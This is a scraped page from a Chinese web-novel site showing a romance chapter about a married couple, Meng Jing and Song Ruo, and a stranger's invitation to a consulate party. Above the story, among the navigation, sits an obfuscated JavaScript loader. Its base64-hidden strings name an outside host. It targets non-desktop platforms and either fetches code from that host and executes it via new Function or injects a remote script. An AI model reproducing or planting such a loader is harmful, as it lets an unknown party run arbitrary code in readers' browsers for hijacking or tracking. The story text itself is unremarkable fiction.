98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(92(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

努力工作难道不应该?宋若刮刮她的鼻梁。

老婆,你说说你,为谁辛苦为谁甜哪,咱也不差钱,咱也不差奖,拍戏完全就是你的兴趣爱好和艺术追求,那慢工出细活不就好啦吗,不要把自己弄得太辛苦,大鲸鱼苦口婆心地,不然我该多心疼呀。

宋若微笑着,并不答话,脸颊上有浅淡的红晕,双眼水汪汪的,泛着朦胧氤氲的雾气。

孟璟情难自禁,低头扶着太太的脑袋,覆上她的唇,也许是很久没有见过了,太太也比较热情,整个人软软地贴上来,双手勾着她的脖子,整个人热情洋溢。

中途孟璟停下来建议,呐,明天不要去剧组,陪我滑雪嘛,好不好,老婆~

宋若若不则声。

孟璟施展自己的逆天吻技,继续亲,亲完再问:好不好嘛~

若若脸上一个微醺似的浅笑,不,明天真的赶进度,等我拍完再陪你。

那我推掉吧。孟璟将头搁在太太的颈侧,声音有些闷闷的,我不想离开你,我去剧组陪你。

不用。若若摸摸她的头发,去滑雪吧。

我和刚认识的女的单独滑雪也没事吗?孟璟口吻已经稍微炸起来了。

宋若若模模糊糊地应了一声,头歪了歪,轻轻抱住了她。

从这里开始孟璟就有点生气了,老婆也太不敏感了吧,太不把她当回事了吧!还不是看准了她爱惨了她,不会跟别人跑掉,也太不紧张了。

这就是她和若若之间永恒存在的那个问题。

除了不粘她,还老把她往外推,无论她跟谁玩,这小药瓶子都浑不在意,真是岂有此理!

本来就小别胜新婚,累积了太多太多能量,带着这些情绪,这天晚上她不免倍加放肆,若若好几次想要扳回一局都被她毫不留情地压制。

次日清早宋若醒过来,发现似曾相识的一幕大鲸鱼气鼓鼓地坐在床头。

宋若抬手摸摸她的脸,早。

大鲸鱼侧脸在她手中蹭蹭,嘟了嘟嘴:中午我要和公司的职员一起吃饭,下午要陪新认识的女孩子滑雪,晚上才能见了。

若若坐起身来,点点头:好。

孟璟睨她一眼,你就没有什么要叮嘱我的吗?

好好保暖,注意安全。

孟璟眼睛泛起红来:老婆不怕我被拐走吗?

若若弯弯眼睛:不怕。

拐走了你也无所谓吗?

我会亲自找回来。

孟璟在太太面前虽然是这样一幅贪嗔痴恨的懵懂顽童形象,可一旦到了别人跟前,她就变成那个最成熟犀利的,上午是和公司的下属们一起滑雪,也教了好几个,兴许是把手练熟了,下午到了约定时间,与那金发女郎一起滑时,更为头头是道,引得那一位连夸孟璟教得好,是个好老师。

孟璟讶异起来,你知道我名字?

大家并没有做过详细的自我介绍,昨天她只是自称meng,而对方说自己叫Silvia。

听见她问,Silvia瞬间爆出令孟璟惊讶不已的一串中文:我知道你啊,明天有晚会,希望你能来,参加。她一伸手,掌心向上摊开,立马有人过来往她手里放了一封请帖模样的东西,她笑容洋溢地将它递到孟璟面前。

伯尔尼领事馆。

孟璟看着那个举办宴会的地点,稍微有点吃惊。倒不是因为别的,就因为这女孩子看起来十分平易近人,像邻家小姑娘,完全不像从政的人。

抱歉,我要陪我太太。不能去。不过还是很感谢你的邀请。孟璟采用小药瓶子接受采访时用的那种官方语调,微笑着说。

没关系呀,可以携眷出席的。请带太太一起来!Silvia大有不达目的誓不罢休的架势,我一个人都不认识,这个聚会又必须去,我有点不安,拜托你也来玩!

是这样,我太太作为公众人物,对于一些牵扯太多政治因素的场合不方便出席。

Silvia再三保证,只是一个私人宴会,也没有媒体在场。让她们一定来。

晚上太太回来,孟璟都忘了赌气,径直把这桩奇遇转告给她。

第二次见面就邀请她去宴会的滑雪女孩。

孟璟这个人,路人缘、观众缘都很好的,不拍戏的这些年粉丝增长速度并不比若若差多少。常年受到陌生人垂青,已经习惯了诸如此类的好运,这倒没感觉有什么不对。

奇怪的地方在于,在领事馆宴会厅举办的晚会,照说是比较闲人勿入的,她竟还有资格私下邀请客人,看来是个颇有来历的人。

只不过孟璟向来对于政治不感兴趣,所以即使Silvia是哪国的首席外交官,她也不会有印象。

若若看过请柬,设计得低调但不失奢华,看得出来很用心,是独一份的,没有表明宴会主题,只说了时间和地点,她问孟璟:明天?你要去吗?

孟璟一听,不由得又新仇旧恨一起涌上心头来啦。

宋若若真的永远淡定!

这时候,身为老婆她的表现难道不应该是怎么我一不在你身边你就勾搭上别人了!不许去!那种宴会有什么参加的价值!乖乖留在这里陪我!这样?

为什么一副处之泰然的样子啊!

孟璟最忌讳的就是这茬,老婆已经很久很久很久没吃过醋了。

两个人在一起时,固然是如胶似漆,蜜里调油,但总觉得哪里缺少点什么。

她知道这样兴风作浪有点没事找事的嫌疑,可她实在只要一看到若若那个波澜不惊的脸,就万、分、不、爽尤其是在她本人的衬托下。

这方面她可以说小心眼到极点若若早不拍亲热戏了,可只要镜头里出现别的男的女的,那人只是碰碰若若的头发,拉拉小手什么的,她就恨不得砸电视,大喊住手,你们不行只有我可以。并且当天气得吃不下饭。

这么两厢一比较,若若真是大方!

你看,孟璟刚说了个去字,她立刻就让助理着手给她物色装备。

诚然这也是爱的表达。

在一起的时候,老婆真的对她很好,可以说无微不至。

但是仔细推敲,这简直像妈妈带孩子,已经接近于无私的爱和宠溺了。

孟璟不满意啊。她不要这样。

她希望自己的老婆不要把她当小孩子,当成对象来折腾,当成依靠来撒娇这个路数才对啊。

若若这时忽然转个身,走上前来,伸手勾住了她的脖子,两眼泪汪汪的。孟璟心肝一颤,揽住了太太的腰,轻轻问:老婆怎么啦。若若踮起脚来,两个人的嘴唇轻轻碰到了,温热的触感互相叠加,孟璟蹭她鼻尖,然而老婆明显不满足于这种程度,踮起脚尖,加深了这个吻,整个人也贴上来,手手温柔地抚着她的背。绵长的亲吻过后,小药瓶子泪眼汪汪地说:不要去。她声音还是悄悄的:不要去哪里呀?若若眼角渗出泪水,摇着小脑袋说:哪里你都不要去。陪我她不禁心荡神驰起来,抬手替若若擦掉眼泪:哎呀,这么严重啊,都哭了,不就是一个晚上的时间嘛,一晚上都不行嘛,还是带你一起去。若若两个眼圈儿更红了:不,不要别人,只要你和我,二人世界就够了。孟璟美滋滋的,于是低头又亲了下去

抹香鲸?不远处传来未婚妻的声音。

孟璟一个激灵醒了过来,僵立在原地,脸上的肌肉也绷紧了。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间